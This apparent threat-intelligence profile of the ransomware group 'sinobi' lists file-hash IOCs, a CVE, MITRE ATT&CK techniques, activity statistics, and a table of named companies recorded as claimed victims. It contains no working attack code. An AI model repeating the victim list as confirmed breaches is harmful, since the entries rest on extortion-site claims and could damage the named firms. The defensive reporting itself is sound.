sinobi
Ransomware group profile
276Victims
RussiaSource country
58Impact score
Description
Sinobi is a financially motivated threat group that employs a hybrid Ransomware-as-a-Service (RaaS) model. Emerging in mid-2025, it is characterized by a disciplined approach to attacks, extensive operational security, and a focus on stealth through living-off-the-land techniques.
Key insights
- •Utilizes a double-extortion model, threatening public disclosure of stolen data if ransom demands are not met.
- •Initial access is commonly gained through stolen VPN or Remote Desktop Protocol (RDP) credentials, often exploiting known vulnerabilities.
- •Employs sophisticated evasion tactics, including disabling endpoint protection, modifying firewall configurations, and data exfiltration using legitimate tools like Rclone.
- •Has been linked to past groups like Lynx and INC due to code overlaps and operational similarities.
- •Targets a diverse range of sectors, with notable attacks on organizations in healthcare and manufacturing.
Threat Level & Status Breakdown
For sinobi · Based on incidents in selected period
2.6threat level
Aggressiveness5/ 10
Lethality0/ 10
Criticality2.7/ 10
Status Breakdown
Claimed100.0%276
First seenJun 2025
Last seenMay 2026
Avg ransom—
Payment rate—
Statusactive
Sophistication0
Last updatedJun 2, 2026
Recent activity
Monthly attack count for sinobi in the selected period
276Total attacks
58peak in Oct
25.1avg / month
↓ 1 vs first month
Intelligence
IOCs, YARA/Sigma rules, and related families for sinobi
- deea481121129d4779195e93fdc39ae62fecb168fd5a384d0ccf8082f06092e5
- 39300863bcaad71e5d4efc9a1cae118440aa778f
- 6bc8e3505d9f51368ddf323acb6abc49
- d520d06d78afcad2e03842cb8db4622d18b92739e89dfb8dadf5743f30dcd903
- dcb0e301261b81e5888c0ba6a8ce887b8ed52e5d
- e75e5778e71e062ce4a7af673f0b2513854d2367fee0f01a26c0c998863bdf6e
- a768244ca664349a6d1af84a712083c0
- 1b2a1e41a7f65b8d9008aa631f113cef36577e912c13f223ba8834bbefa4bd14
- eae09889399fe4fb8e78b114dba0527de913d12fb1802944a88ed136e3e90577
- d4919a7402d7ae02516589fbdfb3cc436749544052843a37b5d36ac4b7385b18
TTPs & Attack Vectors
Tools, initial access, and MITRE ATT&CK techniques for sinobi
CVE-2024-40766
Defense Evasion
T1070
Indicator Removal
T1562.001
Disable or Modify Tools
Execution
T1059.001
PowerShell
Impact
T1486
Data Encrypted for Impact
T1490
Inhibit System Recovery
Lateral Movement
T1021.001
Remote Desktop Protocol
Persistence
T1543.003_1
Windows Service
Victims(200)
| Company | Domain | Country | Industry | Status | Discovered | |
|---|---|---|---|---|---|---|
| Neurotrials Research Inc | — | US United States | Healthcare | Claimed | 26 days ago | |
| Scales and Associates Inc | — | US United States | Professional Services | Claimed | 29 days ago | |
| Unre3d | — | CN China | Technology | Claimed | 29 days ago | |
| Bay State Land Services | — | US United States | Other | Claimed | 29 days ago | |
| Celeris Networks | — | US United States | Technology | Claimed | 29 days ago | |
| Positiwise Infotech Pvt | — | IN India | Technology | Claimed | 29 days ago | |
| Amerinational Management Services (AMS) | ourams.com | US United States | Professional Services | Claimed | 3 months ago | |
| Elgi Electric & Industries | elgielectric.com | IN India | Manufacturing | Claimed | 3 months ago | |
| Interpack Northwest | interpacknorthwest.com | US United States | Other | Claimed | 3 months ago | |
| Summa Energy | summaenergy.com | US United States | Energy & Utilities | Claimed | 3 months ago | |
| Teco | teco.com | US United States | Energy & Utilities | Claimed | 3 months ago | |
| McAfee Tool & Die | mcafeetool.com | US United States | Manufacturing | Claimed | 3 months ago | |
| Eco Sound Builders | ecosoundbuilders.com | US United States | Other | Claimed | 3 months ago | |
| Graymatter | graymatter.com | GB United Kingdom | Technology | Claimed | 3 months ago | |
| Iblesoft | iblesoft.com | US United States | Technology | Claimed | 3 months ago | |
| Mayfair Hotels & Resorts | mayfairhotels.com | IN India | Hospitality | Claimed | 3 months ago | |
| Gentegra | gentegra.com | US United States | Technology | Claimed | 3 months ago | |
| Electriduct | electriduct.com | US United States | Manufacturing | Claimed | 3 months ago | |
| Saltech Systems | saltechsystems.com | US United States | Technology | Claimed | 3 months ago | |
| The Sundher Group | sundhergroup.com | CA Canada | Other | Claimed | 4 months ago |
Page 1 of 10
Affected countries(56)
Countries where this group has been reported to target or leak victims.
🇦🇪United Arab Emirates🇦🇷Argentina🇦🇹Austria🇦🇺Australia🇧🇪Belgium🇧🇷Brazil🇧🇸Bahamas🇨🇦Canada🇨🇭Switzerland🇨🇱Chile🇨🇳China🇨🇴Colombia🇨🇷Costa Rica🇨🇿Czech Republic🇩🇪Germany🇩🇰Denmark🇩🇲Dominica🇪🇸Spain🇪🇹Ethiopia🇫🇮Finland🇫🇷France🇬🇧United Kingdom🇭🇰Hong Kong🇮🇩Indonesia🇮🇱Israel🇮🇳India🇮🇹ItalyJersey🇯🇵Japan🇰🇪KenyaKorea, Republic of🇲🇦Morocco🇲🇹Malta🇲🇽Mexico🇲🇾Malaysia🇳🇱Netherlands🇳🇴Norway🇳🇿New Zealand🇵🇪Peru🇵🇭Philippines🇵🇱PolandPuerto Rico🇵🇹Portugal🇵🇾Paraguay🇷🇴RomaniaRussian Federation🇸🇦Saudi Arabia🇸🇪Sweden🇸🇬Singapore🇸🇮Slovenia🇹🇭Thailand🇹🇷TurkeyTaiwan, Province of China🇺🇸United StatesVenezuela, Bolivarian Republic of🇿🇦South Africa